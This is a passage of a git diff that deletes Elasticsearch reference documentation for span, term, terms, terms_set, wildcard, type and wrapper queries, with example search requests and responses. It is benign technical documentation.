a/docs/reference/query-dsl/span-near-query.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[query-dsl-span-near-query]] -=== Span near query -++++ -Span near -++++ - -Matches spans which are near one another. One can specify _slop_, the -maximum number of intervening unmatched positions, as well as whether -matches are required to be in-order. The span near query maps to Lucene -`SpanNearQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_near": { - "clauses": [ - { "span_term": { "field": "value1" } }, - { "span_term": { "field": "value2" } }, - { "span_term": { "field": "value3" } } - ], - "slop": 12, - "in_order": false - } - } -} --------------------------------------------------- - -The `clauses` element is a list of one or more other span type queries -and the `slop` controls the maximum number of intervening unmatched -positions permitted. diff --git a/docs/reference/query-dsl/span-not-query.asciidoc b/docs/reference/query-dsl/span-not-query.asciidoc deleted file mode 100644 index 99814eba9d8..00000000000 --- a/docs/reference/query-dsl/span-not-query.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[query-dsl-span-not-query]] -=== Span not query -++++ -Span not -++++ - -Removes matches which overlap with another span query or which are -within x tokens before (controlled by the parameter `pre`) or y tokens -after (controlled by the parameter `post`) another SpanQuery. The span not -query maps to Lucene `SpanNotQuery`. 
Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_not": { - "include": { - "span_term": { "field1": "hoya" } - }, - "exclude": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "la" } }, - { "span_term": { "field1": "hoya" } } - ], - "slop": 0, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `include` and `exclude` clauses can be any span type query. The -`include` clause is the span query whose matches are filtered, and the -`exclude` clause is the span query whose matches must not overlap those -returned. - -In the above example all documents with the term hoya are filtered except the ones that have 'la' preceding them. - -Other top level options: - -[horizontal] -`pre`:: If set the amount of tokens before the include span can't have overlap with the exclude span. Defaults to 0. -`post`:: If set the amount of tokens after the include span can't have overlap with the exclude span. Defaults to 0. -`dist`:: If set the amount of tokens from within the include span can't have overlap with the exclude span. Equivalent - of setting both `pre` and `post`. diff --git a/docs/reference/query-dsl/span-or-query.asciidoc b/docs/reference/query-dsl/span-or-query.asciidoc deleted file mode 100644 index 6c0e78ab266..00000000000 --- a/docs/reference/query-dsl/span-or-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-span-or-query]] -=== Span or query -++++ -Span or -++++ - -Matches the union of its span clauses. The span or query maps to Lucene -`SpanOrQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_or" : { - "clauses" : [ - { "span_term" : { "field" : "value1" } }, - { "span_term" : { "field" : "value2" } }, - { "span_term" : { "field" : "value3" } } - ] - } - } -} --------------------------------------------------- - -The `clauses` element is a list of one or more other span type queries. diff --git a/docs/reference/query-dsl/span-queries.asciidoc b/docs/reference/query-dsl/span-queries.asciidoc deleted file mode 100644 index cc14b0ee493..00000000000 --- a/docs/reference/query-dsl/span-queries.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[span-queries]] -== Span queries - -Span queries are low-level positional queries which provide expert control -over the order and proximity of the specified terms. These are typically used -to implement very specific queries on legal documents or patents. - -It is only allowed to set boost on an outer span query. Compound span queries, -like span_near, only use the list of matching spans of inner span queries in -order to find their own spans, which they then use to produce a score. Scores -are never computed on inner span queries, which is the reason why boosts are not -allowed: they only influence the way scores are computed, not spans. - -Span queries cannot be mixed with non-span queries (with the exception of the `span_multi` query). - -The queries in this group are: - -<>:: -Accepts a list of span queries, but only returns those spans which also match a second span query. - -<>:: -Allows queries like `span-near` or `span-or` across different fields. - -<>:: -Accepts another span query whose matches must appear within the first N -positions of the field. - -<>:: -Wraps a <>, <>, -<>, <>, -<>, or <> query. 
- -<>:: -Accepts multiple span queries whose matches must be within the specified distance of each other, and possibly in the same order. - -<>:: -Wraps another span query, and excludes any documents which match that query. - -<>:: -Combines multiple span queries -- returns documents which match any of the -specified queries. - -<>:: - -The equivalent of the <> but for use with -other span queries. - -<>:: -The result from a single span query is returned as long is its span falls -within the spans returned by a list of other span queries. - - -include::span-containing-query.asciidoc[] - -include::span-field-masking-query.asciidoc[] - -include::span-first-query.asciidoc[] - -include::span-multi-term-query.asciidoc[] - -include::span-near-query.asciidoc[] - -include::span-not-query.asciidoc[] - -include::span-or-query.asciidoc[] - -include::span-term-query.asciidoc[] - -include::span-within-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/span-term-query.asciidoc b/docs/reference/query-dsl/span-term-query.asciidoc deleted file mode 100644 index 0dac73c9f70..00000000000 --- a/docs/reference/query-dsl/span-term-query.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[query-dsl-span-term-query]] -=== Span term query -++++ -Span term -++++ - -Matches spans containing a term. The span term query maps to Lucene -`SpanTermQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : "kimchy" } - } -} --------------------------------------------------- - -A boost can also be associated with the query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : { "value" : "kimchy", "boost" : 2.0 } } - } -} --------------------------------------------------- - -Or : - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : { "term" : "kimchy", "boost" : 2.0 } } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/span-within-query.asciidoc b/docs/reference/query-dsl/span-within-query.asciidoc deleted file mode 100644 index 62a12fc7196..00000000000 --- a/docs/reference/query-dsl/span-within-query.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[query-dsl-span-within-query]] -=== Span within query -++++ -Span within -++++ - -Returns matches which are enclosed inside another span query. The span within -query maps to Lucene `SpanWithinQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_within": { - "little": { - "span_term": { "field1": "foo" } - }, - "big": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "bar" } }, - { "span_term": { "field1": "baz" } } - ], - "slop": 5, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `big` and `little` clauses can be any span type query. Matching -spans from `little` that are enclosed within `big` are returned. 
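-
-Because span queries compose, the clauses of a compound query such as
-`span_near` can themselves be any other span query. As a minimal sketch (the
-`title` field and its terms are hypothetical), the following matches documents
-where `quick` or `fast` appears before `fox` with at most three unmatched
-positions in between:
-
-[source,console]
---------------------------------------------------
-GET /_search
-{
-  "query": {
-    "span_near": {
-      "clauses": [
-        {
-          "span_or": {
-            "clauses": [
-              { "span_term": { "title": "quick" } },
-              { "span_term": { "title": "fast" } }
-            ]
-          }
-        },
-        { "span_term": { "title": "fox" } }
-      ],
-      "slop": 3,
-      "in_order": true
-    }
-  }
-}
---------------------------------------------------
-
-Scoring happens only on the outer `span_near`; the inner `span_or` and
-`span_term` queries just supply the spans it positions against.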
diff --git a/docs/reference/query-dsl/special-queries.asciidoc b/docs/reference/query-dsl/special-queries.asciidoc deleted file mode 100644 index 06f7cc98a73..00000000000 --- a/docs/reference/query-dsl/special-queries.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[specialized-queries]] - -== Specialized queries - -This group contains queries which do not fit into the other groups: - -<>:: -A query that computes scores based on the dynamically computed distances -between the origin and documents' date, date_nanos and geo_point fields. -It is able to efficiently skip non-competitive hits. - -<>:: -This query finds documents which are similar to the specified text, document, -or collection of documents. - -<>:: -This query finds queries that are stored as documents that match with -the specified document. - -<>:: -A query that computes scores based on the values of numeric features and is -able to efficiently skip non-competitive hits. - -<>:: -This query allows a script to act as a filter. Also see the -<>. - -<>:: -A query that allows to modify the score of a sub-query with a script. - -<>:: -A query that accepts other queries as json or yaml string. - -<>:: -A query that promotes selected documents over others matching a given query. - -include::distance-feature-query.asciidoc[] - -include::mlt-query.asciidoc[] - -include::percolate-query.asciidoc[] - -include::rank-feature-query.asciidoc[] - -include::script-query.asciidoc[] - -include::script-score-query.asciidoc[] - -include::wrapper-query.asciidoc[] - -include::pinned-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/term-level-queries.asciidoc b/docs/reference/query-dsl/term-level-queries.asciidoc deleted file mode 100644 index 9ddc4e9d63f..00000000000 --- a/docs/reference/query-dsl/term-level-queries.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[term-level-queries]] -== Term-level queries - -You can use **term-level queries** to find documents based on precise values in -structured data. Examples of structured data include date ranges, IP addresses, -prices, or product IDs. - -Unlike <>, term-level queries do not -analyze search terms. Instead, term-level queries match the exact terms stored -in a field. - - -[NOTE] -==== -Term-level queries still normalize search terms for `keyword` fields with the -`normalizer` property. For more details, see <>. -==== - -[discrete] -[[term-level-query-types]] -=== Types of term-level queries - -<>:: -Returns documents that contain any indexed value for a field. - -<>:: -Returns documents that contain terms similar to the search term. {es} measures -similarity, or fuzziness, using a -{wikipedia}/Levenshtein_distance[Levenshtein edit distance]. - -<>:: -Returns documents based on their <>. - -<>:: -Returns documents that contain a specific prefix in a provided field. - -<>:: -Returns documents that contain terms within a provided range. - -<>:: -Returns documents that contain terms matching a -{wikipedia}/Regular_expression[regular expression]. - -<>:: -Returns documents that contain an exact term in a provided field. - -<>:: -Returns documents that contain one or more exact terms in a provided field. - -<>:: -Returns documents that contain a minimum number of exact terms in a provided -field. You can define the minimum number of matching terms using a field or -script. - -<>:: -Returns documents of the specified type. - -<>:: -Returns documents that contain terms matching a wildcard pattern. 
- - -include::exists-query.asciidoc[] - -include::fuzzy-query.asciidoc[] - -include::ids-query.asciidoc[] - -include::prefix-query.asciidoc[] - -include::range-query.asciidoc[] - -include::regexp-query.asciidoc[] - -include::term-query.asciidoc[] - -include::terms-query.asciidoc[] - -include::terms-set-query.asciidoc[] - -include::type-query.asciidoc[] - -include::wildcard-query.asciidoc[] diff --git a/docs/reference/query-dsl/term-query.asciidoc b/docs/reference/query-dsl/term-query.asciidoc deleted file mode 100644 index 17ad147da3e..00000000000 --- a/docs/reference/query-dsl/term-query.asciidoc +++ /dev/null @@ -1,222 +0,0 @@ -[[query-dsl-term-query]] -=== Term query -++++ -Term -++++ - -Returns documents that contain an *exact* term in a provided field. - -You can use the `term` query to find documents based on a precise value such as -a price, a product ID, or a username. - -[WARNING] -==== -Avoid using the `term` query for <> fields. - -By default, {es} changes the values of `text` fields as part of <>. This can make finding exact matches for `text` field values -difficult. - -To search `text` field values, use the <> query -instead. -==== - -[[term-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "term": { - "user.id": { - "value": "kimchy", - "boost": 1.0 - } - } - } -} ----- - -[[term-top-level-params]] -==== Top-level parameters for `term` -``:: -(Required, object) Field you wish to search. - -[[term-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Term you wish to find in the provided ``. To return a -document, the term must exactly match the field value, including whitespace and -capitalization. - -`boost`:: -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. -+ -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. -+ -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. - -`case_insensitive`:: -(Optional, Boolean) allows ASCII case insensitive matching of the -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping - -[[term-query-notes]] -==== Notes - -[[avoid-term-query-text-fields]] -===== Avoid using the `term` query for `text` fields -By default, {es} changes the values of `text` fields during analysis. For -example, the default <> changes -`text` field values as follows: - -* Removes most punctuation -* Divides the remaining content into individual words, called -<> -* Lowercases the tokens - -To better search `text` fields, the `match` query also analyzes your provided -search term before performing a search. This means the `match` query can search -`text` fields for analyzed tokens rather than an exact term. - -The `term` query does *not* analyze the search term. The `term` query only -searches for the *exact* term you provide. This means the `term` query may -return poor or no results when searching `text` fields. - -To see the difference in search results, try the following example. - -. Create an index with a `text` field called `full_text`. -+ --- - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_text": { "type": "text" } - } - } -} ----- - --- - -. 
Index a document with a value of `Quick Brown Foxes!` in the `full_text` -field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/1 -{ - "full_text": "Quick Brown Foxes!" -} ----- -// TEST[continued] - -Because `full_text` is a `text` field, {es} changes `Quick Brown Foxes!` to -`[quick, brown, fox]` during analysis. - --- - -. Use the `term` query to search for `Quick Brown Foxes!` in the `full_text` -field. Include the `pretty` parameter so the response is more readable. -+ --- - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "term": { - "full_text": "Quick Brown Foxes!" - } - } -} ----- -// TEST[continued] - -Because the `full_text` field no longer contains the *exact* term `Quick Brown -Foxes!`, the `term` query search returns no results. - --- - -. Use the `match` query to search for `Quick Brown Foxes!` in the `full_text` -field. -+ --- - -//// - -[source,console] ----- -POST my-index-000001/_refresh ----- -// TEST[continued] - -//// - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "match": { - "full_text": "Quick Brown Foxes!" - } - } -} ----- -// TEST[continued] - -Unlike the `term` query, the `match` query analyzes your provided search term, -`Quick Brown Foxes!`, before performing a search. The `match` query then returns -any documents containing the `quick`, `brown`, or `fox` tokens in the -`full_text` field. - -Here's the response for the `match` query search containing the indexed document -in the results. - -[source,console-result] ----- -{ - "took" : 1, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 0.8630463, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 0.8630463, - "_source" : { - "full_text" : "Quick Brown Foxes!" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 1/"took" : $body.took/] --- diff --git a/docs/reference/query-dsl/terms-query.asciidoc b/docs/reference/query-dsl/terms-query.asciidoc deleted file mode 100644 index a39fa5c0b0f..00000000000 --- a/docs/reference/query-dsl/terms-query.asciidoc +++ /dev/null @@ -1,249 +0,0 @@ -[[query-dsl-terms-query]] -=== Terms query -++++ -Terms -++++ - -Returns documents that contain one or more *exact* terms in a provided field. - -The `terms` query is the same as the <>, -except you can search for multiple values. - -[[terms-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains `kimchy` -or `elkbee`. - -[source,console] ----- -GET /_search -{ - "query": { - "terms": { - "user.id": [ "kimchy", "elkbee" ], - "boost": 1.0 - } - } -} ----- - -[[terms-top-level-params]] -==== Top-level parameters for `terms` -``:: -+ --- -(Optional, object) Field you wish to search. - -The value of this parameter is an array of terms you wish to find in the -provided field. To return a document, one or more terms must exactly match a -field value, including whitespace and capitalization. - -By default, {es} limits the `terms` query to a maximum of 65,536 -terms. You can change this limit using the <> setting. - -[NOTE] -To use the field values of an existing document as search terms, use the -<> parameters. --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. 
- -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -[[terms-query-notes]] -==== Notes - -[[query-dsl-terms-query-highlighting]] -===== Highlighting `terms` queries -<> is best-effort only. {es} may not -return highlight results for `terms` queries depending on: - -* Highlighter type -* Number of terms in the query - -[[query-dsl-terms-lookup]] -===== Terms lookup -Terms lookup fetches the field values of an existing document. {es} then uses -those values as search terms. This can be helpful when searching for a large set -of terms. - -Because terms lookup fetches values from a document, the <> mapping field must be enabled to use terms lookup. The `_source` -field is enabled by default. - -[NOTE] -By default, {es} limits the `terms` query to a maximum of 65,536 -terms. This includes terms fetched using terms lookup. You can change -this limit using the <> setting. - -To perform a terms lookup, use the following parameters. - -[[query-dsl-terms-lookup-params]] -====== Terms lookup parameters -`index`:: -(Required, string) Name of the index from which to fetch field values. - -`id`:: -(Required, string) <> of the document from which to fetch -field values. - -`path`:: -+ --- -(Required, string) Name of the field from which to fetch field values. {es} uses -these values as search terms for the query. - -If the field values include an array of nested inner objects, you can access -those objects using dot notation syntax. --- - -`routing`:: -(Optional, string) Custom <> of the -document from which to fetch term values. If a custom routing value was provided -when the document was indexed, this parameter is required. - -[[query-dsl-terms-lookup-example]] -====== Terms lookup example - -To see how terms lookup works, try the following example. - -. Create an index with a `keyword` field named `color`. -+ --- - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "color": { "type": "keyword" } - } - } -} ----- --- - -. Index a document with an ID of 1 and values of `["blue", "green"]` in the -`color` field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/1 -{ - "color": ["blue", "green"] -} ----- -// TEST[continued] --- - -. Index another document with an ID of 2 and value of `blue` in the `color` -field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/2 -{ - "color": "blue" -} ----- -// TEST[continued] --- - -. Use the `terms` query with terms lookup parameters to find documents -containing one or more of the same terms as document 2. Include the `pretty` -parameter so the response is more readable. -+ --- - -//// - -[source,console] ----- -POST my-index-000001/_refresh ----- -// TEST[continued] - -//// - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "terms": { - "color" : { - "index" : "my-index-000001", - "id" : "2", - "path" : "color" - } - } - } -} ----- -// TEST[continued] - -Because document 2 and document 1 both contain `blue` as a value in the `color` -field, {es} returns both documents. 
- -[source,console-result] ----- -{ - "took" : 17, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 2, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "color" : [ - "blue", - "green" - ] - } - }, - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "2", - "_score" : 1.0, - "_source" : { - "color" : "blue" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 17/"took" : $body.took/] --- diff --git a/docs/reference/query-dsl/terms-set-query.asciidoc b/docs/reference/query-dsl/terms-set-query.asciidoc deleted file mode 100644 index 2abfe54d539..00000000000 --- a/docs/reference/query-dsl/terms-set-query.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[query-dsl-terms-set-query]] -=== Terms set query -++++ -Terms set -++++ - -Returns documents that contain a minimum number of *exact* terms in a provided -field. - -The `terms_set` query is the same as the <>, except you can define the number of matching terms required to -return a document. For example: - -* A field, `programming_languages`, contains a list of known programming -languages, such as `c++`, `java`, or `php` for job candidates. You can use the -`terms_set` query to return documents that match at least two of these -languages. - -* A field, `permissions`, contains a list of possible user permissions for an -application. You can use the `terms_set` query to return documents that -match a subset of these permissions. - -[[terms-set-query-ex-request]] -==== Example request - -[[terms-set-query-ex-request-index-setup]] -===== Index setup -In most cases, you'll need to include a <> field mapping in -your index to use the `terms_set` query. This numeric field contains the -number of matching terms required to return a document. - -To see how you can set up an index for the `terms_set` query, try the -following example. - -. Create an index, `job-candidates`, with the following field mappings: -+ --- - -* `name`, a <> field. This field contains the name of the -job candidate. - -* `programming_languages`, a <> field. This field contains -programming languages known by the job candidate. - -* `required_matches`, a <> `long` field. This field contains -the number of matching terms required to return a document. - -[source,console] ----- -PUT /job-candidates -{ - "mappings": { - "properties": { - "name": { - "type": "keyword" - }, - "programming_languages": { - "type": "keyword" - }, - "required_matches": { - "type": "long" - } - } - } -} ----- -// TESTSETUP - --- - -. Index a document with an ID of `1` and the following values: -+ --- - -* `Jane Smith` in the `name` field. - -* `["c++", "java"]` in the `programming_languages` field. - -* `2` in the `required_matches` field. - -Include the `?refresh` parameter so the document is immediately available for -search. - -[source,console] ----- -PUT /job-candidates/_doc/1?refresh -{ - "name": "Jane Smith", - "programming_languages": [ "c++", "java" ], - "required_matches": 2 -} ----- - --- - -. Index another document with an ID of `2` and the following values: -+ --- - -* `Jason Response` in the `name` field. - -* `["java", "php"]` in the `programming_languages` field. - -* `2` in the `required_matches` field. 
- -[source,console] ----- -PUT /job-candidates/_doc/2?refresh -{ - "name": "Jason Response", - "programming_languages": [ "java", "php" ], - "required_matches": 2 -} ----- - --- - -You can now use the `required_matches` field value as the number of -matching terms required to return a document in the `terms_set` query. - -[[terms-set-query-ex-request-query]] -===== Example query - -The following search returns documents where the `programming_languages` field -contains at least two of the following terms: - -* `c++` -* `java` -* `php` - -The `minimum_should_match_field` is `required_matches`. This means the -number of matching terms required is `2`, the value of the `required_matches` -field. - -[source,console] ----- -GET /job-candidates/_search -{ - "query": { - "terms_set": { - "programming_languages": { - "terms": [ "c++", "java", "php" ], - "minimum_should_match_field": "required_matches" - } - } - } -} ----- - -[[terms-set-top-level-params]] -==== Top-level parameters for `terms_set` - -``:: -(Required, object) Field you wish to search. - -[[terms-set-field-params]] -==== Parameters for `` - -`terms`:: -+ --- -(Required, array of strings) Array of terms you wish to find in the provided -``. To return a document, a required number of terms must exactly match -the field values, including whitespace and capitalization. - -The required number of matching terms is defined in the -`minimum_should_match_field` or `minimum_should_match_script` parameter. --- - -`minimum_should_match_field`:: -(Optional, string) <> field containing the number of matching -terms required to return a document. - -`minimum_should_match_script`:: -+ --- -(Optional, string) Custom script containing the number of matching terms -required to return a document. - -For parameters and valid values, see <>. - -For an example query using the `minimum_should_match_script` parameter, see -<>. --- - -[[terms-set-query-notes]] -==== Notes - -[[terms-set-query-script]] -===== How to use the `minimum_should_match_script` parameter -You can use `minimum_should_match_script` to define the required number of -matching terms using a script. This is useful if you need to set the number of -required terms dynamically. - -[[terms-set-query-script-ex]] -====== Example query using `minimum_should_match_script` - -The following search returns documents where the `programming_languages` field -contains at least two of the following terms: - -* `c++` -* `java` -* `php` - -The `source` parameter of this query indicates: - -* The required number of terms to match cannot exceed `params.num_terms`, the -number of terms provided in the `terms` field. -* The required number of terms to match is `2`, the value of the -`required_matches` field. - -[source,console] ----- -GET /job-candidates/_search -{ - "query": { - "terms_set": { - "programming_languages": { - "terms": [ "c++", "java", "php" ], - "minimum_should_match_script": { - "source": "Math.min(params.num_terms, doc['required_matches'].value)" - }, - "boost": 1.0 - } - } - } -} ----- diff --git a/docs/reference/query-dsl/type-query.asciidoc b/docs/reference/query-dsl/type-query.asciidoc deleted file mode 100644 index f863a3dd0ee..00000000000 --- a/docs/reference/query-dsl/type-query.asciidoc +++ /dev/null @@ -1,18 +0,0 @@ -[[query-dsl-type-query]] -=== Type Query - -deprecated[7.0.0,Types and the `type` query are deprecated and in the process of being removed. See <>.] - -Filters documents matching the provided document / mapping type. 
- -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "type": { - "value": "_doc" - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/wildcard-query.asciidoc b/docs/reference/query-dsl/wildcard-query.asciidoc deleted file mode 100644 index ae84c60abbc..00000000000 --- a/docs/reference/query-dsl/wildcard-query.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[query-dsl-wildcard-query]] -=== Wildcard query -++++ -Wildcard -++++ - -Returns documents that contain terms matching a wildcard pattern. - -A wildcard operator is a placeholder that matches one or more characters. For -example, the `*` wildcard operator matches zero or more characters. You can -combine wildcard operators with other characters to create a wildcard pattern. - -[[wildcard-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains a term -that begins with `ki` and ends with `y`. These matching terms can include `kiy`, -`kity`, or `kimchy`. - -[source,console] ----- -GET /_search -{ - "query": { - "wildcard": { - "user.id": { - "value": "ki*y", - "boost": 1.0, - "rewrite": "constant_score" - } - } - } -} ----- - -[[wildcard-top-level-params]] -==== Top-level parameters for `wildcard` -``:: -(Required, object) Field you wish to search. - -[[wildcard-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Wildcard pattern for terms you wish to find in the provided -``. -+ --- -This parameter supports two wildcard operators: - -* `?`, which matches any single character -* `*`, which can match zero or more characters, including an empty one - -WARNING: Avoid beginning patterns with `*` or `?`. This can increase -the iterations needed to find matching terms and slow search performance. --- - -`boost`:: -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. -+ -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. -+ -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more information, see the -<>. - -`case_insensitive`:: -(Optional, Boolean) allows case insensitive matching of the -pattern with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -[[wildcard-query-notes]] -==== Notes -===== Allow expensive queries -Wildcard queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/wrapper-query.asciidoc b/docs/reference/query-dsl/wrapper-query.asciidoc deleted file mode 100644 index b8b9626202e..00000000000 --- a/docs/reference/query-dsl/wrapper-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-wrapper-query]] -=== Wrapper query -++++ -Wrapper -++++ - -A query that accepts any other query as base64 encoded string. 
- -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "wrapper": { - "query": "eyJ0ZXJtIiA6IHsgInVzZXIuaWQiIDogImtpbWNoeSIgfX0=" <1> - } - } -} --------------------------------------------------- - -<1> Base64 encoded string: `{"term" : { "user.id" : "kimchy" }}` - -This query is more useful in the context of the Java high-level REST client or -transport client to also accept queries as json formatted string. -In these cases queries can be specified as a json or yaml formatted string or -as a query builder (which is a available in the Java high-level REST client). \ No newline at end of file diff --git a/docs/reference/redirects.asciidoc b/docs/reference/redirects.asciidoc deleted file mode 100644 index aa4dd7194e8..00000000000 --- a/docs/reference/redirects.asciidoc +++ /dev/null @@ -1,1325 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="node.name"] -=== Node name setting - -See <>. - -[role="exclude",id="cluster.name"] -=== Cluster name setting - -See <>. - -[role="exclude",id="heap-size"] -=== Heap size settings - -See <>. - -[role="exclude",id="ccr-remedy-follower-index"] -=== Leader index retaining operations for replication - -See <>. - -[role="exclude",id="ccr-leader-not-replicating"] -=== Remedying a follower that has fallen behind - -See <>. - -[role="exclude",id="remote-reovery"] -=== Remote recovery process - -See <>. - -[role="exclude",id="ccr-requirements"] -=== Leader index requirements - -See <>. - -[role="exclude",id="ccr-overview"] -=== Cross-cluster replication overview - -See <>. - -[role="exclude",id="indices-upgrade"] -=== Upgrade API - -The `_upgrade` API is no longer useful and will be removed. Instead, see -<>. - -[role="exclude",id="mapping-parent-field"] -=== `_parent` field - -The `_parent` field has been removed in favour of the <>. - -[role="exclude",id="indices-warmers"] -=== Warmers - -Warmers have been removed. There have been significant improvements to the -index that make warmers not necessary anymore. - -[role="exclude",id="xpack-commands"] -=== X-Pack commands - -See <>. - -[role="exclude",id="xpack-api"] -=== X-Pack APIs - -{es} {xpack} APIs are now documented in <>. - -[role="exclude",id="ml-calendar-resource"]] -=== Calendar resources - -See <> and -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[role="exclude",id="ml-filter-resource"] -=== Filter resources - -See <> and -{ml-docs}/ml-rules.html[Machine learning custom rules]. - -[role="exclude",id="ml-event-resource"] -=== Scheduled event resources - -See <> and -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[role="exclude",id="index-apis"] -=== Index APIs -{es} index APIs are now documented in <>. - -[role="exclude",id="search-request-docvalue-fields"] -=== Doc value fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-explain"] -=== Explain parameter for request body search API -See <>. - -[role="exclude",id="search-request-collapse"] -=== Collapse parameter for request body search API - -See <>. - -[role="exclude",id="search-request-from-size"] -=== From and size parameters for request body search API -See <>. - -[role="exclude",id="search-request-highlighting"] -=== Highlight parameter for request body search API -See <>. - -[role="exclude",id="search-request-index-boost"] -=== Index boost parameter for request body search API -See <>. 
- -[role="exclude",id="search-request-inner-hits"] -=== Inner hits parameter for request body search API -See <>. - -[role="exclude",id="search-request-min-score"] -=== Minimum score parameter for request body search API -See <>. - -[role="exclude",id="search-request-named-queries-and-filters"] -=== Named query parameter for request body search API -See <>. - -[role="exclude",id="search-request-post-filter"] -=== Post filter parameter for request body search API -See <>. - -[role="exclude",id="search-request-preference"] -=== Preference parameter for request body search API -See <>. - -[role="exclude",id="search-request-query"] -=== Query parameter for request body search API -See <>. - -[role="exclude",id="search-request-rescore"] -=== Rescoring parameter for request body search API -See <>. - -[role="exclude",id="search-request-script-fields"] -=== Script fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-scroll"] -=== Scroll parameter for request body search API -See <>. - -[role="exclude",id="search-request-search-after"] -=== Search after parameter for request body search API -See <>. - -[role="exclude",id="search-request-search-type"] -=== Search type parameter for request body search API -See <>. - -[role="exclude",id="search-request-seq-no-primary-term"] -=== Sequence numbers and primary terms parameter for request body search API -See <>. - -[role="exclude",id="search-request-sort"] -=== Sort parameter for request body search API -See <>. - -[role="exclude",id="search-request-source-filtering"] -=== Source filtering parameter for request body search API - -See <>. - -[role="exclude",id="search-request-stored-fields"] -=== Stored fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-track-total-hits"] -=== Track total hits parameter for request body search API -See <>. - -[role="exclude",id="search-request-version"] -=== Version parameter for request body search API -See <>. - -[role="exclude",id="search-suggesters-term"] -=== Term suggester -See <>. - -[role="exclude",id="search-suggesters-phrase"] -=== Phrase suggester -See <>. - -[role="exclude",id="search-suggesters-completion"] -=== Completion suggester -See <>. - -[role="exclude",id="suggester-context"] -=== Context suggester -See <>. - -[role="exclude",id="returning-suggesters-type"] -=== Return suggester type -See <>. - -[role="exclude",id="search-profile-queries"] -=== Profiling queries -See <>. - -[role="exclude",id="search-profile-aggregations"] -=== Profiling aggregations -See <>. - -[role="exclude",id="search-profile-considerations"] -=== Profiling considerations -See <>. - 